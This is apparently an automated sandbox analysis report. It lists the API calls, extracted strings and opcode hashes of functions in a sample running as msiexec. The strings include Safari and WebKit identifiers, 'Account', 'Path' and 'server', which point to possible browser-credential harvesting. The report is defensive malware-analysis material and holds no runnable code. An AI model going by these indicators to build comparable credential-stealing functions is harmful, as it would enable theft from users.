                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                              APIs
                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                              APIs
                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                              • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                              APIs
                                                              • memset.MSVCRT ref: 004095FC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3655998216-0
                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                              APIs
                                                              • memset.MSVCRT ref: 00445426
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                              • String ID:
                                                              • API String ID: 1828521557-0
                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                              APIs
                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                              • String ID:
                                                              • API String ID: 2136311172-0
                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                              APIs
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@
                                                              • String ID:
                                                              • API String ID: 1936579350-0
                                                              • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                              • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 3d8146a08a3d9ec2c9d37e6451c05be40f611b90597bfd58a2ee9084cce88e6e
                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                              • Opcode Fuzzy Hash: 3d8146a08a3d9ec2c9d37e6451c05be40f611b90597bfd58a2ee9084cce88e6e
                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 35a61e7d12dbc562cacc7126c2682e24eeb9e54846c2fecb7db0f1f678c69579
                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                              • Opcode Fuzzy Hash: 35a61e7d12dbc562cacc7126c2682e24eeb9e54846c2fecb7db0f1f678c69579
                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 7fd453b969d00c260b074e87a0c85b013e25bcf615c8c530e1f104565a44bb5d
                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                              • Opcode Fuzzy Hash: 7fd453b969d00c260b074e87a0c85b013e25bcf615c8c530e1f104565a44bb5d
                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                              • GetLastError.KERNEL32 ref: 00409974
                                                              • CloseClipboard.USER32 ref: 0040997D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                              • String ID:
                                                              • API String ID: 3604893535-0
                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 00409882
                                                              • wcslen.MSVCRT ref: 0040988F
                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                              • CloseClipboard.USER32 ref: 004098D7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 1213725291-0
                                                              • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                              • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                              • free.MSVCRT ref: 00418370
                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                              • String ID: OsError 0x%x (%u)
                                                              • API String ID: 2360000266-2664311388
                                                              • Opcode ID: 10f246e2d2747b91fcb32a2333c1ab22a3afbcb686d449b36d250b01fe0f6cf6
                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                              • Opcode Fuzzy Hash: 10f246e2d2747b91fcb32a2333c1ab22a3afbcb686d449b36d250b01fe0f6cf6
                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                              • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                              APIs
                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • memset.MSVCRT ref: 0040265F
                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                              • API String ID: 577499730-1134094380
                                                              • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                              • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                              • String ID: :stringdata$ftp://$http://$https://
                                                              • API String ID: 2787044678-1921111777
                                                              • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                              • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
